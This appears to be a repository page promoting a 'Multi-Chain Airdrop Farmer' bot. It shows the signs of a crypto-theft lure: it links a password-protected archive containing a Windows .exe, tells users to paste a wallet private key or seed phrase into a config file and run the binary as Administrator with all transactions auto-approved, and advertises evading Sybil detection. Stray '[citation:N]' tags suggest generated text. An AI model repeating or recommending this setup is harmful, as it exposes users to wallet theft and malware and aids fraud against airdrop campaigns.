GitHunt
YI

yigitturukk/multichain-airdrop-farmer-bot

Automate your airdrop farming across 10+ chains (Ethereum, Solana, BSC, Arbitrum). Auto-swap, stake, provide liquidity, and complete quests for OpenLedger, Lombard, Spacecoin and more. Maximize points with minimal effort.

Multi-Chain Airdrop Farmer & Quest Bot

Stars
License: MIT

Stop wasting hours on manual DeFi tasks. Let our bot farm airdrops for you 24/7. It automatically interacts with the hottest protocols, so you can accumulate points and qualify for massive token distributions. Perfect for OpenLedger, Lombard, Spacecoin, and more.


๐Ÿ”ฅ Why This Bot?

March 2026 is the biggest token unlock month of the year, with over $6 billion in assets set to be distributed . Don't farm manually when you can automate.

What it does:

  • โœ… Auto-Connect Wallet โ€“ Securely connects via WalletConnect.
  • โœ… Quest Automation โ€“ Automatically performs on-chain tasks: swaps, liquidity provision, lending, borrowing.
  • โœ… Multi-Chain โ€“ Works on Ethereum, Solana, BSC, Arbitrum, Optimism, Base, and more.
  • โœ… Airdrop Tracker โ€“ Monitors your points and progress for top campaigns.
  • โœ… Stealth Mode โ€“ Randomizes transaction timing to avoid Sybil detection.

๐ŸŽ Currently Supported Airdrops (March 2026)

  • OpenLedger (OPEN) โ€“ Phase 2 distribution [citation:4].
  • Lombard (LOMB) โ€“ Season 2 points campaign (ends March 18) [citation:8].
  • Spacecoin (SPACE) โ€“ Kraken unlock distribution [citation:4].
  • Genius Terminal (GT) โ€“ Trading rewards (ends March 16) [citation:8].
  • Ethena (ENA) โ€“ DeFi staking incentives [citation:4].

(More campaigns added weekly)

๐Ÿ“ฅ Download

Password-protected archive with the complete bot.

๐Ÿ“ฅ Download airdrop-farmer-pack.zip
๐Ÿ” Password: airdrop2026

Archive Contents

  • AirdropFarmer.exe โ€“ Main Windows bot
  • config.yaml โ€“ Wallet and chain configuration
  • campaigns.db โ€“ Database of active airdrop tasks
  • README.txt โ€“ Quick start guide

๐Ÿ› ๏ธ Installation (Windows 10/11)

Quick Start

  1. Extract the archive.
  2. Edit config.yaml โ€“ add your wallet private key or seed phrase.
  3. Run AirdropFarmer.exe as Administrator.
  4. The bot connects to the blockchain and starts farming automatically.
  5. Monitor your progress in the dashboard (http://localhost:8080).

โš™๏ธ Configuration Example

wallet:
  private_key: "YOUR_PRIVATE_KEY"  # Fund with small amount for gas
  auto_approve: true                # Auto-approve all transactions

chains:
  - ethereum
  - solana
  - arbitrum
  - optimism

campaigns:
  - openledger
  - lombard
  - spacecoin
  - genius_terminal

settings:
  tx_delay_min: 30                  # Min seconds between txs (avoid Sybil)
  tx_delay_max: 180                  # Max seconds between txs
  max_gas_price_eth: 50              # Max gas price in Gwei
yigitturukk/multichain-airdrop-farmer-bot | GitHunt